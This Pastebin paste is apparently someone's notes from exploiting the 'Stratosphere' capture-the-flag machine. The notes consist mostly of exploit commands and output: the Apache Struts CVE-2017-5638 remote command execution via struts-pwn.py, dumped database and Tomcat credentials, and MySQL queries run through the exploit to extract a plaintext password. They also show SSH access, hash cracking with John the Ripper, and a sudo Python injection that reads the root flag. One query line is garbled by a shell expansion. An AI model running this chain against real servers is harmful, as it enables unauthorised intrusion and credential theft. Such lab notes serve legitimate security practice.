API tools faq
paste
Guest User

Untitled

a guest
Jul 19th, 2018
45
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
raw download clone embed print report
  1. nmap:
  2. 22
  3. 80
  4. 8080
  5. -> /Monitoring/
  6. Checking: python struts-pwn.py --check --url http://stratosphere:8080/Monitoring/
  7. Exploit: python struts-pwn.py --url http://stratosphere:8080/Monitoring/ -c 'ls'
  8.  
  9. CVE 2017-5638
  10.  
  11. db_connect in tomcat folder (www)
  12. user=ssn_admin
  13. pass=AWs64@on*&
  14.  
  15. /etc/tomcat/tomcat-users.xml:
  16. <user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui" />
  17.  
  18. root@kali:~/stratosphere# ./pwn.sh 'echo "SHOW DATABASES" | mysql -u admin -padmin'
  19. echo "SHOW DATABASES" | mysql -u admin -padmin
  20.  
  21. [*] URL: http://stratosphere:8080/Monitoring/
  22. [*] CMD: echo "SHOW DATABASES" | mysql -u admin -padmin
  23. Database
  24. information_schema
  25. users
  26.  
  27. root@kali:~/stratosphere# ./pwn.sh 'echo "use users; show tables;" | mysql -u admin -padmin'
  28. echo "use users; show tables;" | mysql -u admin -padmin
  29.  
  30. [*] URL: http://stratosphere:8080/Monitoring/
  31. [*] CMD: echo "use users; show tables;" | mysql -u admin -padmin
  32. Tables_in_users
  33. accounts
  34.  
  35.  
  36. root@kali:~/stratosphere# ./pwn.sh 'echo "use users; select * from accounts;" | mysql -u admin -padmin'
  37. echo "use users; select gobuster.sh LinEnum.sh nc.sh nikto.sh pwn.sh rev.sh stratosphere_8080_gobust.txt stratosphere_gobust.txt stratosphere_monitoring_8080_nikto.txt stratosphere_nikto_80.txt stratosphere.txt.gnmap stratosphere.txt.nmap stratosphere.txt.xml stratosphese.txt.gnmap stratosphese.txt.nmap stratosphese.txt.xml struts-pwn.py webserver.sh wordlists from accounts;" | mysql -u admin -padmin
  38.  
  39. [*] URL: http://stratosphere:8080/Monitoring/
  40. [*] CMD: echo "use users; select * from accounts;" | mysql -u admin -padmin
  41. fullName password username
  42. Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
  43.  
  44.  
  45.  
  46. root@kali:~/stratosphere# ./pwn.sh 'echo "use users; describe accounts;" | mysql -u admin -padmin'
  47. echo "use users; describe accounts;" | mysql -u admin -padmin
  48.  
  49. [*] URL: http://stratosphere:8080/Monitoring/
  50. [*] CMD: echo "use users; describe accounts;" | mysql -u admin -padmin
  51. Field Type Null Key Default Extra
  52. fullName varchar(45) YES NULL
  53. password varchar(30) YES NULL
  54. username varchar(20) YES NULL
  55.  
  56.  
  57. Use password to SSH (user richard)
  58.  
  59. Run sudo -l /usr/bin/python3 /home/richard/test.py
  60.  
  61. 5af003e100c80923ec04d65933d382cb : kaybboo!
  62. d24f6fb449855ff42344feff18ee2819033529ff : ninjaabisshinobi
  63. 91ae5fc9ecbca9d346225063f23d2bd9 : legend72
  64.  
  65. 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
  66.  
  67. ../run/john /home/hendrik/blake.txt --format=Raw-Blake2 --fork=8 --wordlist=/home/hendrik/rockyou.txt
  68.  
  69. ^^^^^^^^^^^^^^ Rabbit hole but interesting
  70.  
  71. echo '__import__("os").system("cat /root/root.txt")' | sudo /usr/bin/python2.7 /home/richard/test.py
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!